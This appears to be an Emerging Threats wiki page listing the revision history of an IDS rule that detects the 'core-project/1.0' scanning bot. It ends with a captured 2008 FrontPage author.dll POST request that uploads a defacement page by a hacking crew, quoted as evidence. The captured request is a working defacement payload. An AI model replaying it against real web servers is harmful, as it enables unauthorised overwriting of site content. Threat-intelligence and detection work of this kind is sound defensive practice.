alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"User-Agent|3a| core-project/1.0"; fast_pattern:12,11; http_header; classtype:web-application-activity; sid:2008529; rev:6;)

Added 2013-02-27 13:22:51 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"User-Agent|3a| core-project/1.0"; fast_pattern:12,11; http_header; reference:url,doc.emergingthreats.net/2008529; classtype:web-application-activity; sid:2008529; rev:6;)

Added 2012-05-17 22:00:08 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"User-Agent|3a| core-project/1.0"; fast_pattern:only; http_header; reference:url,doc.emergingthreats.net/2008529; classtype:web-application-activity; sid:2008529; rev:5;)

Added 2011-10-12 19:25:19 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"User-Agent|3a| core-project/1.0"; fast_pattern:only; http_header; classtype:web-application-activity; reference:url,doc.emergingthreats.net/2008529; sid:2008529; rev:5;)

Added 2011-09-14 22:38:45 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"User-Agent|3a| core-project/1.0"; fast_pattern:only; http_header; classtype:web-application-activity; reference:url,doc.emergingthreats.net/2008529; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Coreproject; sid:2008529; rev:5;)

Added 2011-02-04 17:27:43 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"|0d 0a|User-Agent\: core-project/1.0"; classtype:web-application-activity; reference:url,doc.emergingthreats.net/2008529; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Coreproject; sid:2008529; rev:2;)

Added 2009-02-11 19:24:44 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"|0d 0a|User-Agent\: core-project/1.0"; classtype:web-application-activity; reference:url,doc.emergingthreats.net/2008529; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Coreproject; sid:2008529; rev:2;)

Added 2009-02-11 19:24:44 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Core-Project Scanning Bot UA Detected"; flow:established,to_server; content:"|0d 0a|User-Agent\: core-project/1.0"; classtype:web-application-activity; sid:2008529; rev:1;)

Added 2008-08-29 11:15:21 UTC

Sample from a series of probes to several web servers on our campus from a machine in Brazil.

POST /_vti_bin/_vti_aut/author.dll HTTP/1.1..MIME-Version: 1.0..User-Agent: core-project/1.0..
Host: www.auckland.ac.nz..Accept: auth/sicily..Content-Length: 1202..Content-Type: application/x-vermeer-urlencoded..
X-Vermeer-Content-Type: application/x-vermeer-urlencoded..Connection: close..Cache-Control: no-cache....
method=put+document%3a4%2e0%2e2%2e4715&service%5fname=
&document=%5bdocument%5fname%3di%2ehtm%3bmeta%5finfo%3d%5b%5d%5d
&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false.
<html>..<head>..<title>linuXploit_crew</title>.
.<meta http-equiv="Content-Type" content="text/html; charset
=iso-8859-1">..</head>....<body bgcolor="#FFFFFF">..<div align="center">..  
<p><font size="5" face="Verdana, Arial, Helvetica, sans-serif"><strong><font color="#FF0000">
linuXploit_crew</font></strong></font></p>..  <p><font color="#FF0000">
HACK IS NOT A CRIME </font><font color="#FF0000">IS ..    BREAKING YOUR "SECURITY"</font></p>..  <p>
<img src="http://www.verdic.com.br/1/securityjpg.png" width="257" height="205">
</p>..  <p><font color="#FF0000"><strong><font size="3" face="Verdana, Arial, Helvetica, sans-serif">
:: ..    Members::<br>..    </font></strong><font size="3" face="Verdana, Arial,
 Helvetica, sans-serif"><b><font size="2">Hualdo ..    - _Se
ri4l_Kill3r_ - DeRf- - LordX</font></b></font></font></p>.. 
 <p align="center"><font size="3" color="#FF0000">Greetz Elite Top Team - OutLaw ..    - Spykids - Red Eye - H4ckersBr</
font></p>.. >

-- RussellFulton - 30 Nov 2008


Topic revision: r2 - 2008-11-30 - RussellFulton
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats